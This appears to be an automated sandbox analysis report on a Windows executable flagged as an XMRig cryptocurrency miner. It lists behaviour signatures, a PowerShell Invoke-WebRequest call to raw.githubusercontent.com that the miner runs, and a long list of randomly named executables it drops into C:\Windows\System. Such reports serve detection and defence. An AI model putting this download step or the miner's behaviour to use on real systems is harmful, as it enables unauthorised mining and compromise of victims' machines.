Malware Analysis Report

2025-04-19 16:57

Sample ID 240522-zdhs9sff4z
Target 35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe
SHA256 61afe9dcf326f010c39c1c3ecb0063abd022cefb7cc29b6a9777d83b0ef27a79
Tags
upx miner xmrig execution
score
10/10

Analysis Overview

score
10/10

SHA256

61afe9dcf326f010c39c1c3ecb0063abd022cefb7cc29b6a9777d83b0ef27a79

Threat Level: Known bad

The file 35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Suspicious use of NtCreateUserProcessOtherParentProcess

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 20:36

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:35

Reported

2024-05-22 20:38

Platform

win7-20240221-en

Max time kernel

149s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A

UPX packed file

upx

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\QykwLoF.exe

C:\Windows\System\QykwLoF.exe

C:\Windows\System\ZDnltHu.exe

C:\Windows\System\ZDnltHu.exe

C:\Windows\System\EuqEobm.exe

C:\Windows\System\EuqEobm.exe

C:\Windows\System\eRMgqMs.exe

C:\Windows\System\eRMgqMs.exe

C:\Windows\System\FNmQNwf.exe

C:\Windows\System\FNmQNwf.exe

C:\Windows\System\iRleuRD.exe

C:\Windows\System\iRleuRD.exe

C:\Windows\System\woJRKmb.exe

C:\Windows\System\woJRKmb.exe

C:\Windows\System\fFAJvhD.exe

C:\Windows\System\fFAJvhD.exe

C:\Windows\System\cADvJiB.exe

C:\Windows\System\cADvJiB.exe

C:\Windows\System\IBJpnqK.exe

C:\Windows\System\IBJpnqK.exe

C:\Windows\System\NVuMEwz.exe

C:\Windows\System\NVuMEwz.exe

C:\Windows\System\qyWhnjc.exe

C:\Windows\System\qyWhnjc.exe

C:\Windows\System\gPNDoOk.exe

C:\Windows\System\gPNDoOk.exe

C:\Windows\System\kFEWSEA.exe

C:\Windows\System\kFEWSEA.exe

C:\Windows\System\RNjUUWr.exe

C:\Windows\System\RNjUUWr.exe

C:\Windows\System\mmTfiDS.exe

C:\Windows\System\mmTfiDS.exe

C:\Windows\System\eIXIPUU.exe

C:\Windows\System\eIXIPUU.exe

C:\Windows\System\HulrEyN.exe

C:\Windows\System\HulrEyN.exe

C:\Windows\System\tVfqxmn.exe

C:\Windows\System\tVfqxmn.exe

C:\Windows\System\YnBgNPF.exe

C:\Windows\System\YnBgNPF.exe

C:\Windows\System\cyMBfBQ.exe

C:\Windows\System\cyMBfBQ.exe

C:\Windows\System\prkxHeJ.exe

C:\Windows\System\prkxHeJ.exe

C:\Windows\System\SQiFTvW.exe

C:\Windows\System\SQiFTvW.exe

C:\Windows\System\mnNPHZT.exe

C:\Windows\System\mnNPHZT.exe

C:\Windows\System\cdxjJgx.exe

C:\Windows\System\cdxjJgx.exe

C:\Windows\System\VBBFbfe.exe

C:\Windows\System\VBBFbfe.exe

C:\Windows\System\iLaKbjG.exe

C:\Windows\System\iLaKbjG.exe

C:\Windows\System\bIwjeSt.exe

C:\Windows\System\bIwjeSt.exe

C:\Windows\System\fNWKAsr.exe

C:\Windows\System\fNWKAsr.exe

C:\Windows\System\VmEqxRB.exe

C:\Windows\System\VmEqxRB.exe

C:\Windows\System\PWNGNCL.exe

C:\Windows\System\PWNGNCL.exe

C:\Windows\System\ZbpYCLn.exe

C:\Windows\System\ZbpYCLn.exe

C:\Windows\System\IcXdCXY.exe

C:\Windows\System\IcXdCXY.exe

C:\Windows\System\bWbldqk.exe

C:\Windows\System\bWbldqk.exe

C:\Windows\System\UHbdFUW.exe

C:\Windows\System\UHbdFUW.exe

C:\Windows\System\GtUTuMf.exe

C:\Windows\System\GtUTuMf.exe

C:\Windows\System\fLWQfVo.exe

C:\Windows\System\fLWQfVo.exe

C:\Windows\System\eMVrwEu.exe

C:\Windows\System\eMVrwEu.exe

C:\Windows\System\cjFnQbX.exe

C:\Windows\System\cjFnQbX.exe

C:\Windows\System\SciMOWe.exe

C:\Windows\System\SciMOWe.exe

C:\Windows\System\xOtGlSd.exe

C:\Windows\System\xOtGlSd.exe

C:\Windows\System\hfxTzQz.exe

C:\Windows\System\hfxTzQz.exe

C:\Windows\System\InMzQyt.exe

C:\Windows\System\InMzQyt.exe

C:\Windows\System\iudcZpi.exe

C:\Windows\System\iudcZpi.exe

C:\Windows\System\gzUuAgJ.exe

C:\Windows\System\gzUuAgJ.exe

C:\Windows\System\NUAnKvR.exe

C:\Windows\System\NUAnKvR.exe

C:\Windows\System\oDsGITI.exe

C:\Windows\System\oDsGITI.exe

C:\Windows\System\MLHYdSw.exe

C:\Windows\System\MLHYdSw.exe

C:\Windows\System\lyzQAyx.exe

C:\Windows\System\lyzQAyx.exe

C:\Windows\System\vVImZKX.exe

C:\Windows\System\vVImZKX.exe

C:\Windows\System\UNPbJlU.exe

C:\Windows\System\UNPbJlU.exe

C:\Windows\System\QKdJlUY.exe

C:\Windows\System\QKdJlUY.exe

C:\Windows\System\eKzzMSR.exe

C:\Windows\System\eKzzMSR.exe

C:\Windows\System\IASRhvV.exe

C:\Windows\System\IASRhvV.exe

C:\Windows\System\qpbsdSp.exe

C:\Windows\System\qpbsdSp.exe

C:\Windows\System\gtGLWMP.exe

C:\Windows\System\gtGLWMP.exe

C:\Windows\System\yjRdPsy.exe

C:\Windows\System\yjRdPsy.exe

C:\Windows\System\VESCPDi.exe

C:\Windows\System\VESCPDi.exe

C:\Windows\System\mflxUDz.exe

C:\Windows\System\mflxUDz.exe

C:\Windows\System\jVVDQsL.exe

C:\Windows\System\jVVDQsL.exe

C:\Windows\System\zlhaoSd.exe

C:\Windows\System\zlhaoSd.exe

C:\Windows\System\FpizkTy.exe

C:\Windows\System\FpizkTy.exe

C:\Windows\System\yXLwPTa.exe

C:\Windows\System\yXLwPTa.exe

C:\Windows\System\tQGxrhB.exe

C:\Windows\System\tQGxrhB.exe

C:\Windows\System\GEFJztd.exe

C:\Windows\System\GEFJztd.exe

C:\Windows\System\XNUHOJa.exe

C:\Windows\System\XNUHOJa.exe

C:\Windows\System\wpxRPeU.exe

C:\Windows\System\wpxRPeU.exe

C:\Windows\System\iueOOEm.exe

C:\Windows\System\iueOOEm.exe

C:\Windows\System\xNZylZU.exe

C:\Windows\System\xNZylZU.exe

C:\Windows\System\MNmNxhu.exe

C:\Windows\System\MNmNxhu.exe

C:\Windows\System\uyhPErs.exe

C:\Windows\System\uyhPErs.exe

C:\Windows\System\MbbhVpb.exe

C:\Windows\System\MbbhVpb.exe

C:\Windows\System\gpetGVc.exe

C:\Windows\System\gpetGVc.exe

C:\Windows\System\PpyykGQ.exe

C:\Windows\System\PpyykGQ.exe

C:\Windows\System\zpJlRPD.exe

C:\Windows\System\zpJlRPD.exe

C:\Windows\System\zJJRIcx.exe

C:\Windows\System\zJJRIcx.exe

C:\Windows\System\OQbxWOC.exe

C:\Windows\System\OQbxWOC.exe

C:\Windows\System\jccUfWG.exe

C:\Windows\System\jccUfWG.exe

C:\Windows\System\IDMqEKU.exe

C:\Windows\System\IDMqEKU.exe

C:\Windows\System\yoznosG.exe

C:\Windows\System\yoznosG.exe

C:\Windows\System\UjnRORf.exe

C:\Windows\System\UjnRORf.exe

C:\Windows\System\qXuKqdR.exe

C:\Windows\System\qXuKqdR.exe

C:\Windows\System\BhltgfR.exe

C:\Windows\System\BhltgfR.exe

C:\Windows\System\gYCLacD.exe

C:\Windows\System\gYCLacD.exe

C:\Windows\System\dFPWoxx.exe

C:\Windows\System\dFPWoxx.exe

C:\Windows\System\XJcInSN.exe

C:\Windows\System\XJcInSN.exe

C:\Windows\System\FgijGaf.exe

C:\Windows\System\FgijGaf.exe

C:\Windows\System\TUvOOwH.exe

C:\Windows\System\TUvOOwH.exe

C:\Windows\System\ohyWblE.exe

C:\Windows\System\ohyWblE.exe

C:\Windows\System\jMpmZnP.exe

C:\Windows\System\jMpmZnP.exe

C:\Windows\System\vrMFowB.exe

C:\Windows\System\vrMFowB.exe

C:\Windows\System\BWXGVRj.exe

C:\Windows\System\BWXGVRj.exe

C:\Windows\System\bxOIPRC.exe

C:\Windows\System\bxOIPRC.exe

C:\Windows\System\wOHqLCu.exe

C:\Windows\System\wOHqLCu.exe

C:\Windows\System\CpCscvz.exe

C:\Windows\System\CpCscvz.exe

C:\Windows\System\SrhfOfg.exe

C:\Windows\System\SrhfOfg.exe

C:\Windows\System\rDPPLuM.exe

C:\Windows\System\rDPPLuM.exe

C:\Windows\System\AcFbNRW.exe

C:\Windows\System\AcFbNRW.exe

C:\Windows\System\OhzRLma.exe

C:\Windows\System\OhzRLma.exe

C:\Windows\System\RGIpeNn.exe

C:\Windows\System\RGIpeNn.exe

C:\Windows\System\wAgnPfz.exe

C:\Windows\System\wAgnPfz.exe

C:\Windows\System\XtfUclx.exe

C:\Windows\System\XtfUclx.exe

C:\Windows\System\pkbAZBv.exe

C:\Windows\System\pkbAZBv.exe

C:\Windows\System\xkdfYqY.exe

C:\Windows\System\xkdfYqY.exe

C:\Windows\System\zihzfma.exe

C:\Windows\System\zihzfma.exe

C:\Windows\System\ViyfbSu.exe

C:\Windows\System\ViyfbSu.exe

C:\Windows\System\ykdpPrd.exe

C:\Windows\System\ykdpPrd.exe

C:\Windows\System\oinrUob.exe

C:\Windows\System\oinrUob.exe

C:\Windows\System\oHqTYAX.exe

C:\Windows\System\oHqTYAX.exe

C:\Windows\System\aigsBxn.exe

C:\Windows\System\aigsBxn.exe

C:\Windows\System\xRNuFup.exe

C:\Windows\System\xRNuFup.exe

C:\Windows\System\hyuxQJs.exe

C:\Windows\System\hyuxQJs.exe

C:\Windows\System\jLKLlWB.exe

C:\Windows\System\jLKLlWB.exe

C:\Windows\System\wSulPpa.exe

C:\Windows\System\wSulPpa.exe

C:\Windows\System\pPaZnSz.exe

C:\Windows\System\pPaZnSz.exe

C:\Windows\System\OegoGns.exe

C:\Windows\System\OegoGns.exe

C:\Windows\System\vNNSWYm.exe

C:\Windows\System\vNNSWYm.exe

C:\Windows\System\KeJNOMF.exe

C:\Windows\System\KeJNOMF.exe

C:\Windows\System\HJAOLFh.exe

C:\Windows\System\HJAOLFh.exe

C:\Windows\System\WNVkLHx.exe

C:\Windows\System\WNVkLHx.exe

C:\Windows\System\kDoUZBn.exe

C:\Windows\System\kDoUZBn.exe

C:\Windows\System\YslKOqE.exe

C:\Windows\System\YslKOqE.exe

C:\Windows\System\DQcRKBp.exe

C:\Windows\System\DQcRKBp.exe

C:\Windows\System\SFQApuh.exe

C:\Windows\System\SFQApuh.exe

C:\Windows\System\NTcPySV.exe

C:\Windows\System\NTcPySV.exe

C:\Windows\System\SvBCMHk.exe

C:\Windows\System\SvBCMHk.exe

C:\Windows\System\RMnAomX.exe

C:\Windows\System\RMnAomX.exe

C:\Windows\System\ekRSfTx.exe

C:\Windows\System\ekRSfTx.exe

C:\Windows\System\SwIRCjt.exe

C:\Windows\System\SwIRCjt.exe

C:\Windows\System\zefBSMX.exe

C:\Windows\System\zefBSMX.exe

C:\Windows\System\AmhYwvN.exe

C:\Windows\System\AmhYwvN.exe

C:\Windows\System\TDLsVeo.exe

C:\Windows\System\TDLsVeo.exe

C:\Windows\System\STBmKMy.exe

C:\Windows\System\STBmKMy.exe

C:\Windows\System\VviTGDd.exe

C:\Windows\System\VviTGDd.exe

C:\Windows\System\VPpANiz.exe

C:\Windows\System\VPpANiz.exe

C:\Windows\System\ctaTuNz.exe

C:\Windows\System\ctaTuNz.exe

C:\Windows\System\htmeLSQ.exe

C:\Windows\System\htmeLSQ.exe

C:\Windows\System\vlVAGfA.exe

C:\Windows\System\vlVAGfA.exe

C:\Windows\System\FDtcUhS.exe

C:\Windows\System\FDtcUhS.exe

C:\Windows\System\NSSdxOi.exe

C:\Windows\System\NSSdxOi.exe

C:\Windows\System\APWgklp.exe

C:\Windows\System\APWgklp.exe

C:\Windows\System\qdkINLW.exe

C:\Windows\System\qdkINLW.exe

C:\Windows\System\BfNULjC.exe

C:\Windows\System\BfNULjC.exe

C:\Windows\System\fgoRkEl.exe

C:\Windows\System\fgoRkEl.exe

C:\Windows\System\fKRyNvv.exe

C:\Windows\System\fKRyNvv.exe

C:\Windows\System\iuRVbqS.exe

C:\Windows\System\iuRVbqS.exe

C:\Windows\System\FxFjNft.exe

C:\Windows\System\FxFjNft.exe

C:\Windows\System\SvreHzO.exe

C:\Windows\System\SvreHzO.exe

C:\Windows\System\fAfWegY.exe

C:\Windows\System\fAfWegY.exe

C:\Windows\System\xQlxFgB.exe

C:\Windows\System\xQlxFgB.exe

C:\Windows\System\hcttFdi.exe

C:\Windows\System\hcttFdi.exe

C:\Windows\System\HLeyuSi.exe

C:\Windows\System\HLeyuSi.exe

C:\Windows\System\ywjIBro.exe

C:\Windows\System\ywjIBro.exe

C:\Windows\System\TNHkike.exe

C:\Windows\System\TNHkike.exe

C:\Windows\System\gsuSuUv.exe

C:\Windows\System\gsuSuUv.exe

C:\Windows\System\JIxkEBp.exe

C:\Windows\System\JIxkEBp.exe

C:\Windows\System\KlxEdxr.exe

C:\Windows\System\KlxEdxr.exe

C:\Windows\System\jnCBmFF.exe

C:\Windows\System\jnCBmFF.exe

C:\Windows\System\TPRWIFM.exe

C:\Windows\System\TPRWIFM.exe

C:\Windows\System\sDqxTvo.exe

C:\Windows\System\sDqxTvo.exe

C:\Windows\System\riuSMqh.exe

C:\Windows\System\riuSMqh.exe

C:\Windows\System\XAyNRRK.exe

C:\Windows\System\XAyNRRK.exe

C:\Windows\System\PQovmcY.exe

C:\Windows\System\PQovmcY.exe

C:\Windows\System\NiqXprE.exe

C:\Windows\System\NiqXprE.exe

C:\Windows\System\kXCotIF.exe

C:\Windows\System\kXCotIF.exe

C:\Windows\System\UwLvaum.exe

C:\Windows\System\UwLvaum.exe

C:\Windows\System\PJTNLMr.exe

C:\Windows\System\PJTNLMr.exe

C:\Windows\System\rpddnuA.exe

C:\Windows\System\rpddnuA.exe

C:\Windows\System\HaCFzrw.exe

C:\Windows\System\HaCFzrw.exe

C:\Windows\System\WHxnKmy.exe

C:\Windows\System\WHxnKmy.exe

C:\Windows\System\UfIyXGb.exe

C:\Windows\System\UfIyXGb.exe

C:\Windows\System\PdUdPpl.exe

C:\Windows\System\PdUdPpl.exe

C:\Windows\System\QYdqCCE.exe

C:\Windows\System\QYdqCCE.exe

C:\Windows\System\ORxLjpR.exe

C:\Windows\System\ORxLjpR.exe

C:\Windows\System\XDlvCqX.exe

C:\Windows\System\XDlvCqX.exe

C:\Windows\System\pytsVqe.exe

C:\Windows\System\pytsVqe.exe

C:\Windows\System\jLwyeyl.exe

C:\Windows\System\jLwyeyl.exe

C:\Windows\System\bpecUWF.exe

C:\Windows\System\bpecUWF.exe

C:\Windows\System\zHqeDuZ.exe

C:\Windows\System\zHqeDuZ.exe

C:\Windows\System\TcmfeGl.exe

C:\Windows\System\TcmfeGl.exe

C:\Windows\System\YJzaltw.exe

C:\Windows\System\YJzaltw.exe

C:\Windows\System\TCAwZIM.exe

C:\Windows\System\TCAwZIM.exe

C:\Windows\System\yglkmyy.exe

C:\Windows\System\yglkmyy.exe

C:\Windows\System\NiskzVp.exe

C:\Windows\System\NiskzVp.exe

C:\Windows\System\sRCTzTy.exe

C:\Windows\System\sRCTzTy.exe

C:\Windows\System\AfOapSy.exe

C:\Windows\System\AfOapSy.exe

C:\Windows\System\zedfRTe.exe

C:\Windows\System\zedfRTe.exe

C:\Windows\System\iYVYOYH.exe

C:\Windows\System\iYVYOYH.exe

C:\Windows\System\DWEiqiY.exe

C:\Windows\System\DWEiqiY.exe

C:\Windows\System\CXRoCqF.exe

C:\Windows\System\CXRoCqF.exe

C:\Windows\System\DDhUOOc.exe

C:\Windows\System\DDhUOOc.exe

C:\Windows\System\vxsJyYg.exe

C:\Windows\System\vxsJyYg.exe

C:\Windows\System\HwaWZtO.exe

C:\Windows\System\HwaWZtO.exe

C:\Windows\System\saKDuoh.exe

C:\Windows\System\saKDuoh.exe

C:\Windows\System\PrKtyMg.exe

C:\Windows\System\PrKtyMg.exe

C:\Windows\System\efzilET.exe

C:\Windows\System\efzilET.exe

C:\Windows\System\uiWBVnc.exe

C:\Windows\System\uiWBVnc.exe

C:\Windows\System\xOQLMty.exe

C:\Windows\System\xOQLMty.exe

C:\Windows\System\KODtDZl.exe

C:\Windows\System\KODtDZl.exe

C:\Windows\System\JwSHDgZ.exe

C:\Windows\System\JwSHDgZ.exe

C:\Windows\System\ApZAckg.exe

C:\Windows\System\ApZAckg.exe

C:\Windows\System\VgkSOaw.exe

C:\Windows\System\VgkSOaw.exe

C:\Windows\System\qaueJCf.exe

C:\Windows\System\qaueJCf.exe

C:\Windows\System\BbaGFVE.exe

C:\Windows\System\BbaGFVE.exe

C:\Windows\System\xyFaJLI.exe

C:\Windows\System\xyFaJLI.exe

C:\Windows\System\wzhKlDU.exe

C:\Windows\System\wzhKlDU.exe

C:\Windows\System\YSYaiKU.exe

C:\Windows\System\YSYaiKU.exe

C:\Windows\System\PgNBKDn.exe

C:\Windows\System\PgNBKDn.exe

C:\Windows\System\PvuPgOr.exe

C:\Windows\System\PvuPgOr.exe

C:\Windows\System\sVngQLA.exe

C:\Windows\System\sVngQLA.exe

C:\Windows\System\sTNGsPg.exe

C:\Windows\System\sTNGsPg.exe

C:\Windows\System\deuOTDZ.exe

C:\Windows\System\deuOTDZ.exe

C:\Windows\System\gEIIbPi.exe

C:\Windows\System\gEIIbPi.exe

C:\Windows\System\GUDdRiy.exe

C:\Windows\System\GUDdRiy.exe

C:\Windows\System\mqPYfCZ.exe

C:\Windows\System\mqPYfCZ.exe

C:\Windows\System\nWJhZwY.exe

C:\Windows\System\nWJhZwY.exe

C:\Windows\System\BqKHaOM.exe

C:\Windows\System\BqKHaOM.exe

C:\Windows\System\gCgmanF.exe

C:\Windows\System\gCgmanF.exe

C:\Windows\System\ESNpWHD.exe

C:\Windows\System\ESNpWHD.exe

C:\Windows\System\qUSTfOE.exe

C:\Windows\System\qUSTfOE.exe

C:\Windows\System\iHCKzoP.exe

C:\Windows\System\iHCKzoP.exe

C:\Windows\System\xmiZCUk.exe

C:\Windows\System\xmiZCUk.exe

C:\Windows\System\ZEvpqzR.exe

C:\Windows\System\ZEvpqzR.exe

C:\Windows\System\Rholjai.exe

C:\Windows\System\Rholjai.exe

C:\Windows\System\FbgtBEO.exe

C:\Windows\System\FbgtBEO.exe

C:\Windows\System\XIqHJSZ.exe

C:\Windows\System\XIqHJSZ.exe

C:\Windows\System\octfMMt.exe

C:\Windows\System\octfMMt.exe

C:\Windows\System\jhqKAWR.exe

C:\Windows\System\jhqKAWR.exe

C:\Windows\System\MOVAtwO.exe

C:\Windows\System\MOVAtwO.exe

C:\Windows\System\cnCYFVD.exe

C:\Windows\System\cnCYFVD.exe

C:\Windows\System\LIrXIEJ.exe

C:\Windows\System\LIrXIEJ.exe

C:\Windows\System\VHRwrEE.exe

C:\Windows\System\VHRwrEE.exe

C:\Windows\System\ghnLopP.exe

C:\Windows\System\ghnLopP.exe

C:\Windows\System\RrGLIzy.exe

C:\Windows\System\RrGLIzy.exe

C:\Windows\System\BKTBAhE.exe

C:\Windows\System\BKTBAhE.exe

C:\Windows\System\IcTUVaD.exe

C:\Windows\System\IcTUVaD.exe

C:\Windows\System\PShmFEI.exe

C:\Windows\System\PShmFEI.exe

C:\Windows\System\WeCZexM.exe

C:\Windows\System\WeCZexM.exe

C:\Windows\System\yILzvrN.exe

C:\Windows\System\yILzvrN.exe

C:\Windows\System\hDFlYTH.exe

C:\Windows\System\hDFlYTH.exe

C:\Windows\System\AysBzwp.exe

C:\Windows\System\AysBzwp.exe

C:\Windows\System\snaTFtl.exe

C:\Windows\System\snaTFtl.exe

C:\Windows\System\sPWgQBu.exe

C:\Windows\System\sPWgQBu.exe

C:\Windows\System\ROWfCCv.exe

C:\Windows\System\ROWfCCv.exe

C:\Windows\System\pKyRDNW.exe

C:\Windows\System\pKyRDNW.exe

C:\Windows\System\NbYxJDB.exe

C:\Windows\System\NbYxJDB.exe

C:\Windows\System\aeYXUDD.exe

C:\Windows\System\aeYXUDD.exe

C:\Windows\System\vUvaUrY.exe

C:\Windows\System\vUvaUrY.exe

C:\Windows\System\KDylknM.exe

C:\Windows\System\KDylknM.exe

C:\Windows\System\yhnuPHm.exe

C:\Windows\System\yhnuPHm.exe

C:\Windows\System\DwynKrZ.exe

C:\Windows\System\DwynKrZ.exe

C:\Windows\System\AadJqov.exe

C:\Windows\System\AadJqov.exe

C:\Windows\System\InpbEsJ.exe

C:\Windows\System\InpbEsJ.exe

C:\Windows\System\iEFcmoF.exe

C:\Windows\System\iEFcmoF.exe

C:\Windows\System\BKSYeEp.exe

C:\Windows\System\BKSYeEp.exe

C:\Windows\System\QDoZSMK.exe

C:\Windows\System\QDoZSMK.exe

C:\Windows\System\SbrTvZo.exe

C:\Windows\System\SbrTvZo.exe

C:\Windows\System\LZiZKWD.exe

C:\Windows\System\LZiZKWD.exe

C:\Windows\System\OePguIS.exe

C:\Windows\System\OePguIS.exe

C:\Windows\System\TGtNYAr.exe

C:\Windows\System\TGtNYAr.exe

C:\Windows\System\eOPhaZE.exe

C:\Windows\System\eOPhaZE.exe

C:\Windows\System\NeyGoKd.exe

C:\Windows\System\NeyGoKd.exe

C:\Windows\System\BBwDsSN.exe

C:\Windows\System\BBwDsSN.exe

C:\Windows\System\pdHSnqt.exe

C:\Windows\System\pdHSnqt.exe

C:\Windows\System\objVsPl.exe

C:\Windows\System\objVsPl.exe

C:\Windows\System\thIQTpM.exe

C:\Windows\System\thIQTpM.exe

C:\Windows\System\jaTSLLI.exe

C:\Windows\System\jaTSLLI.exe

C:\Windows\System\vbpLRJC.exe

C:\Windows\System\vbpLRJC.exe

C:\Windows\System\iTlOvhd.exe

C:\Windows\System\iTlOvhd.exe

C:\Windows\System\KmmqjGl.exe

C:\Windows\System\KmmqjGl.exe

C:\Windows\System\sZGYpFf.exe

C:\Windows\System\sZGYpFf.exe

C:\Windows\System\nFvkaFD.exe

C:\Windows\System\nFvkaFD.exe

C:\Windows\System\WoWcXvk.exe

C:\Windows\System\WoWcXvk.exe

C:\Windows\System\wXTbtiu.exe

C:\Windows\System\wXTbtiu.exe

C:\Windows\System\TyNgsxS.exe

C:\Windows\System\TyNgsxS.exe

C:\Windows\System\yXwtzop.exe

C:\Windows\System\yXwtzop.exe

C:\Windows\System\BFZjZUz.exe

C:\Windows\System\BFZjZUz.exe

C:\Windows\System\fyxbiWK.exe

C:\Windows\System\fyxbiWK.exe

C:\Windows\System\GEviRsg.exe

C:\Windows\System\GEviRsg.exe

C:\Windows\System\LntKFdY.exe

C:\Windows\System\LntKFdY.exe

C:\Windows\System\lAvyAiC.exe

C:\Windows\System\lAvyAiC.exe

C:\Windows\System\vFvcbKp.exe

C:\Windows\System\vFvcbKp.exe

C:\Windows\System\ghQuchm.exe

C:\Windows\System\ghQuchm.exe

C:\Windows\System\tEtWRNs.exe

C:\Windows\System\tEtWRNs.exe

C:\Windows\System\xGvmYGa.exe

C:\Windows\System\xGvmYGa.exe

C:\Windows\System\zFjQYOg.exe

C:\Windows\System\zFjQYOg.exe

C:\Windows\System\BZHnBrD.exe

C:\Windows\System\BZHnBrD.exe

C:\Windows\System\pkCPvDf.exe

C:\Windows\System\pkCPvDf.exe

C:\Windows\System\VnYAByk.exe

C:\Windows\System\VnYAByk.exe

C:\Windows\System\JDIWRMq.exe

C:\Windows\System\JDIWRMq.exe

C:\Windows\System\JZSVunI.exe

C:\Windows\System\JZSVunI.exe

C:\Windows\System\GsSoLSw.exe

C:\Windows\System\GsSoLSw.exe

C:\Windows\System\EbMZjYR.exe

C:\Windows\System\EbMZjYR.exe

C:\Windows\System\AQTgFUa.exe

C:\Windows\System\AQTgFUa.exe

C:\Windows\System\NuxFVSW.exe

C:\Windows\System\NuxFVSW.exe

C:\Windows\System\LqKtmON.exe

C:\Windows\System\LqKtmON.exe

C:\Windows\System\rTyQYkG.exe

C:\Windows\System\rTyQYkG.exe

C:\Windows\System\xPufWFn.exe

C:\Windows\System\xPufWFn.exe

C:\Windows\System\STGZbXD.exe

C:\Windows\System\STGZbXD.exe

C:\Windows\System\qhxnnBe.exe

C:\Windows\System\qhxnnBe.exe

C:\Windows\System\eNBJapv.exe

C:\Windows\System\eNBJapv.exe

C:\Windows\System\uDPcOnP.exe

C:\Windows\System\uDPcOnP.exe

C:\Windows\System\HIMvspI.exe

C:\Windows\System\HIMvspI.exe

C:\Windows\System\EZFFAGC.exe

C:\Windows\System\EZFFAGC.exe

C:\Windows\System\LEDojLq.exe

C:\Windows\System\LEDojLq.exe

C:\Windows\System\eBvHBAO.exe

C:\Windows\System\eBvHBAO.exe

C:\Windows\System\hFzFMrl.exe

C:\Windows\System\hFzFMrl.exe

C:\Windows\System\NgluyXl.exe

C:\Windows\System\NgluyXl.exe

C:\Windows\System\Sopyxkq.exe

C:\Windows\System\Sopyxkq.exe

C:\Windows\System\OptDDBc.exe

C:\Windows\System\OptDDBc.exe

C:\Windows\System\EstFNyN.exe

C:\Windows\System\EstFNyN.exe

C:\Windows\System\dsfynXR.exe

C:\Windows\System\dsfynXR.exe

C:\Windows\System\aoBgVsg.exe

C:\Windows\System\aoBgVsg.exe

C:\Windows\System\mOdGNhK.exe

C:\Windows\System\mOdGNhK.exe

C:\Windows\System\HckpNHY.exe

C:\Windows\System\HckpNHY.exe

C:\Windows\System\ILbuOZj.exe

C:\Windows\System\ILbuOZj.exe

C:\Windows\System\EADvrqV.exe

C:\Windows\System\EADvrqV.exe

C:\Windows\System\mZmWPWn.exe

C:\Windows\System\mZmWPWn.exe

C:\Windows\System\WkSdTaj.exe

C:\Windows\System\WkSdTaj.exe

C:\Windows\System\QbNccMa.exe

C:\Windows\System\QbNccMa.exe

C:\Windows\System\qBfgqyW.exe

C:\Windows\System\qBfgqyW.exe

C:\Windows\System\kwSodMS.exe

C:\Windows\System\kwSodMS.exe

C:\Windows\System\limqQar.exe

C:\Windows\System\limqQar.exe

C:\Windows\System\BExYalf.exe

C:\Windows\System\BExYalf.exe

C:\Windows\System\RUMvAeW.exe

C:\Windows\System\RUMvAeW.exe

C:\Windows\System\xIFyFKI.exe

C:\Windows\System\xIFyFKI.exe

C:\Windows\System\SXPgEoR.exe

C:\Windows\System\SXPgEoR.exe

C:\Windows\System\MDQuIPI.exe

C:\Windows\System\MDQuIPI.exe

C:\Windows\System\adMzozP.exe

C:\Windows\System\adMzozP.exe

C:\Windows\System\ieQyvqR.exe

C:\Windows\System\ieQyvqR.exe

C:\Windows\System\kMlMDCS.exe

C:\Windows\System\kMlMDCS.exe

C:\Windows\System\CKqYVyt.exe

C:\Windows\System\CKqYVyt.exe

C:\Windows\System\PcNMGKl.exe

C:\Windows\System\PcNMGKl.exe

C:\Windows\System\jygNTQV.exe

C:\Windows\System\jygNTQV.exe

C:\Windows\System\qPuLTGK.exe

C:\Windows\System\qPuLTGK.exe

C:\Windows\System\OQKkzCW.exe

C:\Windows\System\OQKkzCW.exe

C:\Windows\System\eYQBpsd.exe

C:\Windows\System\eYQBpsd.exe

C:\Windows\System\BYemVGl.exe

C:\Windows\System\BYemVGl.exe

C:\Windows\System\BeGMSzK.exe

C:\Windows\System\BeGMSzK.exe

C:\Windows\System\FUUprWC.exe

C:\Windows\System\FUUprWC.exe

C:\Windows\System\ZEPdghu.exe

C:\Windows\System\ZEPdghu.exe

C:\Windows\System\cEorNyZ.exe

C:\Windows\System\cEorNyZ.exe

C:\Windows\System\rhSxSfg.exe

C:\Windows\System\rhSxSfg.exe

C:\Windows\System\rFityNX.exe

C:\Windows\System\rFityNX.exe

C:\Windows\System\kQbFsLv.exe

C:\Windows\System\kQbFsLv.exe

C:\Windows\System\EsNKPzl.exe

C:\Windows\System\EsNKPzl.exe

C:\Windows\System\gaQJTir.exe

